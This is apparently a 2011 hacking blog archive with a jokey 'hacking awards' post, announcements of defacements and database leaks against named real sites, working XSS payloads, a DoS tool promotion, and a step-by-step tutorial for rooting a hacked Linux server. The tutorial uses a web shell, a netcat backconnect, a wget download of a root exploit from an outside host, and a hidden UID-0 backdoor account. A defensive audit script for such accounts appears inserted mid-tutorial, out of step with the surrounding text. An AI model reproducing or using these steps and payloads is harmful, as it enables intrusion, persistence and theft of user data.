Saturday, December 31, 2011

Hacking Awards : Best of Year 2011


2011 has been labeled the "Year of the Hack" or "Epic #Fail 2011". Hacking has become much easier over the years, which is why 2011 saw a lot of hacking, for good and for bad. Hackers are coming up with tools and finding new methods for hacking faster than companies can increase their security. Every year brings advances in the tools and programs that hackers can use.

At the end of year 2011 we decided to give "The Hacker News Awards 2011". The Hacker News Awards will be an annual awards ceremony celebrating the achievements and failures of security researchers and the Hacking community. The THN Award is judged by a panel of respected security researchers and Editors at The Hacker News.


Year 2011 came to an end following Operation Payback and Antisec, which targeted companies refusing to accept payments to WikiLeaks, such as Visa and Amazon. Those attacks were carried out by Anonymous & Lulzsec. This year corporations, international agencies, and governments are experiencing a flood of what are called Advanced Persistent Threats. APTs refer to a group of well-funded, highly capable hackers pursuing a specific agenda, often organized by a nation or State. Sony somehow pissed off the hacking group LulzSec, which downloaded information for millions of users, while posting to Sony's system: "LulzSec was here you sexy bastards! Stupid Sony, so very stupid."

The Hacker News Awards Categories & Winners
1.) Person of the Year : Julian Paul Assange


He is, of course, the lean, tall, and pale 39-year-old Australian master hacker at the white-hot center of the whistle-blowing website WikiLeaks and, after revealing thousands of secret Afghan battlefield reports this week, the subject of investigation by U.S. authorities. 2011 could also be called the "Age of WikiLeaks". Assange described himself in a private conversation as "the heart and soul of this organisation, its founder, philosopher, spokesperson, original coder, organizer, financier, and all the rest". Wikileaks celebrated its 5th birthday on 4th October 2011; for being only 5 years old it has done a remarkable and outstanding job of serving the people, the one thing most governments in the world have left off their agendas. Keep up the good work Wikileaks, we stand behind you in support.

2.) Best Hacking Group of the Year 2011 : ANONYMOUS


DECK THE HALLS AND BATTEN DOWN THE SECURITY SYSTEMS…..THEY AIN’T GOIN AWAY!
Anonymous hackers have gained world wide attention because of their hacktivism. Anonymous is not an organization. Anonymous has no leaders, no gurus, no ideologists. Anonymous has performed many operations like Attack on HBGary Federal, 2011 Bank of America document release, Operation Sony, Operation Anti-Security and lots more. Complete Coverage on all Anonymous related news is here.

3.) Best Whitehat hacker of the Year 2011 : CHARLIE MILLER


CHARLIE SHOWS TUNA ISN’T THE ONLY THING TO PROFIT FROM!
Charlie Miller is a former hacker who has become an information security consultant now working with the Department of Defense (DOD) and helping out with cyber security. He spent five years working for the National Security Agency. Miller demonstrated his hacks publicly on products manufactured by Apple. In 2008 he won a $10,000 cash prize at the hacker conference Pwn2Own in Vancouver Canada for being the first to find a critical bug in the ultrathin MacBook Air. The next year, he won $5,000 for cracking Safari. In 2009 he also demonstrated an SMS processing vulnerability that allowed for complete compromise of the Apple iPhone and denial-of-service attacks on other phones. In 2011 he found a hole in iPhone and iPad security. Charlie Miller gets a kick out of defeating Apple’s security mechanisms, using his hacking skills to break into Macbooks and iPhones.

4.) Best Leak of the year 2011 : HBGARY FEDERAL EMAILS LEAKED BY ANONYMOUS



GEE GREG, YOU THOUGHT WE JUST PLAYED WITH MATTEL COMPUTERS!  NOT!!!!!
HBGary Federal, which was helping the federal government track down cyber activists, was itself hacked by the very same activists! Gotta love these guys. Through an elegant but by-the-numbers social engineering effort, those fun fellas at Anonymous hacked and publicly shamed poor little HBGary Federal. Massive reputation damage and tons of turnover in executive leadership resulted. Anonymous released 27,000 emails from the server of Greg Hoglund, chief executive of the software security firm HBGary. They also posted 50,000 emails of Aaron Barr, the CEO of its sister organization, HBGary Federal. They obtained the emails by hacking into Hoglund’s email.

5.) Best Defacement of the Year 2011 : DNS HIJACKING OF HIGH PROFILE SITES BY TURKGUVENLIGI


TURKGUVENLIGI……..THE GIFT THAT KEEPS ON GIVING!!
Turkguvenligi, also known by the name "TG Hacker", hacked some very high profile sites using DNS hijacking. Sites included Theregister.co.uk, Vodafone, Telegraph, Acer and National Geographic. He diverted visitors to a page declaring it was “World Hackers Day”. TurkGuvenligi has claimed credit for dozens of similar defacement attacks since late 2008.

6.) Craziest Hack of the year: INMOTION HOSTING (Over 700,000 Websites Hacked)

BEWARE OF TIGERS IN MOTION…….COMING TO YOUR WEBSITE SOON!
InMotion's data center got hit by the hacker who calls himself TiGER-M@TE, leaving a few hundred thousand website owners with nonfunctional pages and 700,000 web pages defaced. He is also the one responsible for the attack carried out on Google Bangladesh. In our humble opinion, this is the craziest hack of the year.

7.) Malware of Year 2011 : DuQu

ALAH CAN’T HELP IRAN…….NOT WITH DuQu ON THE LOOSE!
This year was really hot on malware discovery and analysis. DuQu became the first known network modular rootkit. DuQu gives hackers the flexibility to remove and add new features quickly and without special effort. Some experts have doubts about the relation between the Stuxnet and DuQu creators, as they both aim at stealing and collecting data related to Iranian agencies' activities.

8.) Best Hacking Tool of the Year 2011 - ANTI (Android Network Toolkit)


HEY CYBER WORLD, STICK THIS IN YOUR TOOL BELT!
ANTI is the smallest but most powerful hacking tool, developed by the company Zimperium. Anti (Android Network Toolkit) is an app that uses WiFi scanning tools to scan networks. You can scan a network that you have the phone connected to or you can scan any other nearby open networks. Security admins can use Anti to test network host vulnerabilities for DoS attacks and other threats. Features: OS detection, traceroute, port connect, Wi-Fi monitor, HTTP server, man-in-the-middle threats, remote exploits, password cracker, DoS attack and plugins.

9.) High Profile Hacker of the Year 2011 : LULZSEC

LULZSEC KEEPS US LAUGHING ALL THROUGH 2011!
Lulz Security, commonly abbreviated as LulzSec, is a computer hacker group that claims responsibility for several high profile attacks, including the compromise of user accounts from Sony Pictures in 2011. The group also claimed responsibility for taking the CIA website offline. It has gained attention due to its high profile targets and the sarcastic messages it has posted in the aftermath of its attacks. The group's first recorded attack was against Fox.com's website. LulzSec does not appear to hack for financial profit. The group's claimed main motivation is to have fun by causing mayhem. They do things "for the lulz" and focus on the possible comedic and entertainment value of attacking targets.

10.) Biggest Victim of the Year 2011 : SONY

SONY SHINES AS THE BIGGEST VICTIM OF ALL!
Sony gets the Most Epic fail award, so we want to give the Best Victim of the year award to Sony. Almost all of Sony’s websites, including Indonesia, Japan, Thailand, Greece, Canada, Netherlands, Europe, Russia, Portugal & Sony PlayStation Network, were hacked. Various Sony domains were defaced, and the personal information of 77 million people, including customer names, addresses, e-mail addresses, birthdays, PlayStation Network and Qriocity passwords, user names, online handles and possibly credit cards, was exposed. Sony expects the hack of the PlayStation Network to cost ¥14 billion (US$170 million).


11.) Most Spammy Social Network : FACEBOOK
FACEBOOK OUGHTA FACE IT……..IT’S A RIPE TARGET FOR 2012
Social network sites such as Facebook, Google+ or Twitter are gaining popularity. But the 'Web 2.0' presents new dangers. The wave of pornographic and violent images, spam messages, viruses and various worms that flooded Facebook over the past year makes it the Most Spammy Social Network of the Year. Social media is the new frontier for all of this spam. The attack tricked users into clicking on a story they thought would bring them a related video or picture. Instead, Facebook members were taken to websites that attacked their browsers with malicious software and posted violent and disturbing images to their news feeds.

Friday, December 30, 2011

www.orinfor.gov.rw hacked by x________X

www.orinfor.gov.rw was hacked by "x________X", who found a SQL injection vulnerability on the orinfor website.
DEFACE PAGE:
http://www.orinfor.gov.rw/x________X.html

Vulnerable URL:
http://www.orinfor.gov.rw/jobdetails.php?jid=3

Number of Columns:
5

Version:
5.0.51a-3ubuntu5.5

Databases:
information_schema,mysql,orinfordb

Tables from current DB:
orinfor_adverts,orinfor_audiofiles,orinfor_comments,orinfor_communityradios,orinfor_config,orinfor_downloads,orinfor_forex,orinfor_news,orinfor_newscategories,orinfor_othercontent,orinfor_pollanswers,orinfor_polls,orinfor_pollvotes,orinfor_profiles,orinfor_radiomessages,orinfor_radiopresenters,orinfor_radioprogrammes,orinfor_regionalcenters,orinfor_search,orinfor_settings,orinfor_sitesections,orinfor_subscriptions,orinfor_tvprogrammes,orinfor_tvstaff,orinfor_userpermissions,orinfor_users,orinfor_vacancies,orinfor_videos,orinfor_volumes

Columns from 'orinfor_users':
Date of Announcement: userid,username,password,isadmin,fullname


Wednesday, December 28, 2011

www.newvision.co.ug Hacked by Rwandan Hackers

www.newvision.co.ug was hacked by Rwandan hackers. They hacked into the database of the website and exposed sensitive information like admin details and much more.
 Database info :


Friday, December 23, 2011

www.sevenseasmusic.fr Hacked by Rwandan hackers

www.sevenseasmusic.fr
Rwandan Hackers found an SQL-i vulnerability on www.sevenseasmusic.fr. According to him there is a non-persistent XSS vulnerability and also an SQL-i vulnerability.
Using the vulnerability, an attacker can exploit the entire database and gain illegal access.
Vulnerable Website
ADMIN INFO :


I apologize for people who want to download his mixtape


Microsoft Introduced Picture Passwords For Windows 8

 

The experience of signing in to your PC with touch has traditionally been a cumbersome one. In a world with increasingly strict password requirements—with numbers, symbols, and capitalization—it can take upwards of 30 seconds to enter a long, complex password on a touch keyboard. To get rid of all this, Microsoft is introducing a new technology that lets you log in to your Windows 8 PC with a picture password. Likely designed for touchscreens, it prompts users with a familiar picture of their choice and asks them to make a series of finger gestures on the screen to set up password protection. Microsoft recommends that users pick at least three gestures, choosing between a circle, a tap and a line drawn between two points. When a user logs into a Windows 8 machine using Picture Password, they simply have to replicate the correct placement, order and direction of all gestures.

Microsoft dictates the set of three different gestures after research showed that login time was cut from 17 seconds using free form gestures to 4 seconds using preset gestures. Users don’t have to be 100 percent accurate with the placement of the gestures as the image is broken up into a grid and the combination of replicating the three gestures is assigned a percentage score each time the login process is attempted through an algorithm. If the score is 90 percent or above, the user gains access to the system. Microsoft also outlined how security is increased with the Picture Password method. For instance, if a user creates a six-character text password with at least one uppercase letter and one number, there would be 7 billion combinations available. However, if a user creates a picture password with six gestures using only taps, that number increases to 1.3 trillion combinations. Even further, reducing the amount of gestures to five and including at least one circle and one line gesture within the group increases the number of combinations to approximately 70 trillion. The Windows engineering team has just started building the Picture Password functionality and hopes to include it within the final version of Windows 8 likely released during 2012.
You can find more information about this article on the Windows 8 Developer Blog

Friday, December 16, 2011

Server Rooting Tutorial and Adding New Root User


Welcome to a tutorial on how to root a Linux server.
This is going to be a short, HQ tutorial with pictures included (for better learning).


So let's start with things you will need:




  • 1) Shelled website
  • 2) Local root exploit
  • 3) NetCat



Chapter 1 - Gathering information


Open up your .php shell on a hacked webserver.
I have mine for an example




Now you need to check what kernel your slave is using...
It should be something like 


Linux somerandomhosting.com 2.6.18-8.el5 #1 SMP Fri Jan 26 14:15:21 EST 2007 i686


Next thing you wanna do is to look for a local root exploit.
In the example provided, mine is 2.6.18-8.el5 #1 SMP Fri Jan 26 14:15:21 EST 2007 i686.


Here's the list of exploits
http://pastebin.com/A0sUhhrz

NOTE: If your webserver has a 2.6.18 2011 kernel, then you have a 0.0001% chance that you will root it, because there's no public exploit for that version.


Chapter 2 - Backconnecting to the server
For this you will need:


1) NetCat
2) Open port (Example. 443 I won't teach how to port forward,use Google if you don't know how!!)


So open your netcat and type:
-l -n -v -p 443
Hit "Enter"


Now it should write "listening on [any] 443 ..."
Good.
Go back to your shell and go to "BackConnect function"
Many shells have it.
Enter your port and press "Connect".



Now it should connect to your netcat 
I got something like this


Chapter 3 - Downloading exploit and executing it
Now we will need our exploit from Chapter 1.
There are 2 ways of uploading:

1) Using shell uploader
2) Using 'wget' function (Requires backconnection)

I'm going to use 'wget' function because it's easier and faster.
So copy your exploit link (Mine one http://localroot.th3-0utl4ws.com/xploits...8-164.zip) and go back to your netcat and type:

Now it downloaded our exploit named "2.6.18-164.zip" on our server.

If your exploit is downloaded as anyrandomname.c you must compile it.
To do that, first download that exploit and then type:

gcc anyrandomname.c -o anyrandomname
And our exploit is compiled. (If you get errors when compiling then find another exploit)


If you downloaded your exploit in zip file anyrandomname.zip type:

unzip anyrandomname.zip


Now you should have your exploit (Like mine "2.6.18-164")

If you completed all steps it's time to get root.

Type:

chmod 777 yourexploit'sname
With common sense where i typed "yourexploit'sname" you will type your exploit's name.

And one last final step is to run our exploit
./yourexploit'sname


To check if you got root type

id
or
whoami

Mine steps to root


Chapter 4 - Adding root user
Adding new root user is fairly easy
We use this command:
adduser -u 0 -o -g 0 -G 0,1,2,3,4,6,10 -M root2

Command explanations:
adduser - Using Linux adduser command to create a new user account or to update default new user information.

-u 0 -o - Set the value of user id to 0.

-g 0 - Set the initial group number or name to 0

-G 0,1,2,3,4,6,10 - Set supplementary group to:
0 = root
1 = bin
2 = daemon
3 = sys
4 = adm
6 = disk
10 = wheel

-M - 'home directory' not created for the user.

root2 - User name of the new user account. NOTE: Change root2 to your desired username.

Now you need to set a password for your username.
Type in next:
passwd root2

(root2 is your username)

See an example

[root@fedora ~]# passwd root2
Changing password for user root2.
New UNIX password:
Retype new UNIX password:
passwd: all authentication tokens updated successfully.

To check if you did alright

id root2
(Root2 is your username)
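
The account made in Chapter 4 leaves a recognisable footprint for a defender: UID 0 under a name other than root (possible only because of `-o`), no home directory (`-M`), and membership of groups 0,1,2,3,4,6,10. The following is an added example, not part of the original tutorial, that audits passwd and group files for that footprint; the function names and the sample files are constructed for illustration, and `find_shared_uids` goes beyond the tutorial's case by reporting any UID shared by several accounts.

```shell
#!/bin/sh
# Added example: audit passwd/group data for a second UID-0 account.
# Point the functions at /etc/passwd and /etc/group, or at copies from an image.

# Print "uid:name1,name2" for every UID shared by more than one account,
# which is what the -o (non-unique UID) option makes possible.
find_shared_uids() {
    awk -F: '$1 !~ /^#/ && $3 ~ /^[0-9]+$/ {
        uid = $3 + 0
        sep = (uid in seen) ? "," : ""
        names[uid] = names[uid] sep $1
        seen[uid]++
    }
    END { for (u in seen) if (seen[u] > 1) print u ":" names[u] }' "$1" |
        sort -t: -k1,1n
}

# For each account other than "root" with UID 0, print one finding line giving
# its primary GID, whether its home directory exists, and its group memberships.
audit_uid0_clones() {
    passwd_file=$1
    group_file=$2
    awk -F: '$1 !~ /^#/ && $3 ~ /^0+$/ && $1 != "root" { print $1 ":" $4 ":" $6 }' \
        "$passwd_file" |
    while IFS=: read -r user gid home; do
        groups=$(awk -F: -v u="$user" '
            { n = split($4, m, ",")
              for (i = 1; i <= n; i++)
                  if (m[i] == u) { sep = (out == "") ? "" : ","; out = out sep $1 } }
            END { print out }' "$group_file")
        # -M in the tutorial's command means no home directory was created
        if [ -d "$home" ]; then state=present; else state=missing; fi
        echo "uid0-clone user=$user gid=$gid home=$home($state) groups=${groups:-none}"
    done
}

# Constructed sample: a stock layout plus the account the tutorial's command creates.
write_sample() {
    cat > "$1/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
root2:x:0:0::/home/root2:/bin/bash
EOF
    cat > "$1/group" <<'EOF'
root:x:0:root,root2
bin:x:1:root,bin,daemon,root2
daemon:x:2:root,bin,daemon,root2
sys:x:3:root,bin,adm,root2
adm:x:4:root,adm,daemon,root2
disk:x:6:root,root2
wheel:x:10:root,root2
apache:x:48:
EOF
}

tmp=$(mktemp -d)
write_sample "$tmp"
find_shared_uids "$tmp/passwd"
audit_uid0_clones "$tmp/passwd" "$tmp/group"
rm -rf "$tmp"
```

A finding from `audit_uid0_clones` on a production host is worth correlating with the web server's access logs and file changes from around the time the account was added.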


GNY shell - http://privatepaste.com/1321f97984
Google - http://google.com
NetCat - http://downloadnetcat.com/nc11nt.zip

So that concluded our rooting tutorial.
I hope that someone will learn from this and that this thread will be bookmarked for generations

Friday, December 9, 2011

Newtimes Database Compromised

Rwandan Hackers found multiple vulnerabilities on New Times. The database has been hacked and exposed by Rwandan hackers on pastebin.

Database link:http://pastebin.com/8uqsc6FC

XSS Vulnerability in Google Code site

XSS (cross-site scripting) vulnerability discovered in the Google Code website.
Proof Of Concept: Go to http://code.google.com/apis/ajax/playground/ and click on edit HTML, then remove all the code, type this script: <img src="<img src=search"/onerror=alert("XSS")//"> and click on DEBUG CODE. It will first show you "Sample must have <head> element"; click OK and wait for the window to load. If nothing happens, try the same thing again or simply click on RUN CODE, and you will get a popup, which is the XSS.

Another Similar XSS posted by +Pirate, as posted on HackForum Community.

4shared.com Is Vulnerable To XSS


Free online file sharing website 4shared.com is vulnerable, Rwandan Hackers found this non persistent XSS vulnerability.

To know the Vulnerable link submitted by the hacker click HERE

Monday, December 5, 2011

Babylon Search Engine Is XSS Vulnerable



XSS vulnerability on Babylon search engine. According to the hacker, the Babylon search engine is vulnerable to a particular type of XSS attack. It can be XSSed by first adding a normal string at the beginning and then pushing the script. The search engine has implemented XSS filtering, but it can be bypassed by crafting a different vector like the one shown in the screenshot.
LINK:
 http://search.babylon.com/?q=helloworld%3Cscript%3Ealert%28%27hacked+alert+by+Rwandan+Hackers%27%29%3B%3C%2Fscript%3Ehelloworld&s=web&as=0&babsrc=home

Sunday, December 4, 2011

Trustbank website Ghana hacked

Multiple sql injection found on www.trustbank.com.gh/ by Rwandan Hackers
Using the vulnerability an attacker can exploit the entire database and gain illegal access
Vulnerable Website

ADMIN INFO:

Saturday, December 3, 2011

20 WEBSITES DEFACED BY RWANDAN HACKERS

22 websites defaced by Rwandan Hackers. They used SQL injection and a new vulnerability called "Encodable".

Defaced Link:

www.premierleaguepool.co.uk Database Hacked

Premier League Fantasy Pool, one of the most popular soccer websites in the UK, is under cyber attack. A hacker has found an SQL-i vulnerability on the official site of Free Premier League Soccer Pool, hacked into the database of that site and exposed 690+ user credentials including user names, email IDs, passwords and so on. The hacked information is openly available here.

Thursday, December 1, 2011

smartrwanda.org under ddos attack


Hackers are using a new tool called Assassin DoS 2.0.3. This tool is based on a new attack that uses HTTP flooding to take a site down; it will work if you try a dedicated server key. Another feature of Assassin DoS is that it will not take all your resources as other DoS tools do, so there is only about 100 milliseconds of delay when you hit the target. It is available for Windows.


Its available to Download here